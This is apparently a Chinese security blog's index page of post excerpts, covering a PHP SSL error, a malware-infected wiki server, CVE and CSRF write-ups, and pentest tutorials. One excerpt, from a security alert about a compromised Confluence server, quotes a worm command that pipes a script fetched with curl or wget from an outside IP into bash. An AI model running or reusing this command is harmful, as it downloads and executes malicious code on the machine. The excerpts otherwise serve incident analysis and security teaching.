2024-11-06 厉飞雨 阅读(24) 评论(0) 赞(4)

用file_get_contents()函数，访问自己的网站竟然失败了。。 错误代码： OpenSSL Error messages: error:14090086... 然后去网上搜，发现啥方法也不管用。。 最后发现是自己网站的证书有问题，所以失败了。。 所以，如果用这个函数来https访问自己的网站失败的话，说明是网站证书有问题，而不是php.ini里面ope...

2024-11-06 厉飞雨 阅读(21) 评论(0) 赞(2)

**现象：** 新接手的一台wiki服务器， 听同事说，机器中过病毒，没清理干净，还是有问题的。 我总结了几次规律。 每次到周二上午的时候，服务器CPU 爆满， 导致其他服务终止， SSH登录就出现问题。 问题： 2023年8月29日上午9点10分 周二 1. 进程里有有个kk.x86的进程 2. 有一个/tmp/kk.x86的文件 3. MySql会挂掉 ...

2024-11-06 厉飞雨 阅读(21) 评论(0) 赞(3)

高危蠕虫下载命令执行(wget\&curl) 命令行 bash -c (curl -s 194.38.22.53/cf.sh||wget -q -O- 194.38.22.53/cf.sh)|bash 父进程命令行 /opt/atlassian/confluence/jre//bin/java -Djava.util.logging.con...

2024-11-06 厉飞雨 阅读(23) 评论(0) 赞(3)

Diffie-Hellman Key Agreement Protocol 资源管理错误漏洞（CVE-2002-20001） ### 漏洞描述： Diffie-Hellman Key Agreement Protocol是一种密钥协商协议。它最初在 Diffie 和 Hellman 关于公钥密码学的开创性论文中有所描述。该密钥协商协议允许 Alice 和 Bob 交换公钥值...

2024-11-06 厉飞雨 阅读(21) 评论(0) 赞(4)

0x00前言 {#0x00%E5%89%8D%E8%A8%804953} ==================================== 相信大家之前都看过我博客这篇添加了密码。距离发现这个漏洞已经一年多了， 这个漏洞现在已经修复了遂把他公开出来给大家学习一下。其实蛮简单的\~\~\~ （PS：本文单纯讲漏洞。不涉及实战利用） 0x01 正文 {#0x01...

2024-11-06 厉飞雨 阅读(23) 评论(0) 赞(4)

0x00前言 {#0x00%E5%89%8D%E8%A8%804919} ==================================== **本篇文章作者YanXia，本文属i春秋原创奖励计划<https://bbs.ichunqiu.com/thread-63286-1-1.html>，未经许可禁止转载。** **注意:本次渗透为授权项目，所涉及漏洞...

2024-11-06 厉飞雨 阅读(23) 评论(0) 赞(4)

0x00前言 {#0x00%E5%89%8D%E8%A8%808164} ==================================== **本篇文章作者YanXia，本文属i春秋原创奖励计划<https://bbs.ichunqiu.com/thread-63287-1-1.html>，未经许可禁止转载。** **注意:本次渗透为授权项目，所涉及漏洞...

2024-11-06 厉飞雨 阅读(23) 评论(0) 赞(3)

0x00前言 {#0x00%E5%89%8D%E8%A8%801628} ------------------------------------ 上半年就说要写怎么挖csrf漏洞了，主要是懒....后面就忘记写了。今天正好有人问到，索性就写一篇文章出来 0x01 什么是CSRF {#0x01+%E4%BB%80%E4%B9%88%E6%98%AFCSRF7275} ---...

2024-11-06 厉飞雨 阅读(22) 评论(0) 赞(4)

**本次教程来自YanXia，转载请注明作者信息,博客地址<http://www.535yx.cn>，感谢** 0x00 引言 {#0x00+%E5%BC%95%E8%A8%804722} -------------------------------------- 短信轰炸漏洞属于web程序中的逻辑漏洞，随着互联网技术与电子商务的不断发展与，互联网所带来的安全...

2024-11-06 厉飞雨 阅读(20) 评论(0) 赞(3)

第一章：基础篇 第二章：SQL注入攻击 第三章：XSS漏洞 第四章：上传漏洞 第五章：CSRF漏洞 第六章：文件包含 第七章：验证码绕过 第八章：命令执行 第九章：其他漏洞 第十章：综合漏洞分析 ![07616-hnfkh1twvs6.png](http://static.51tbox.com/stati...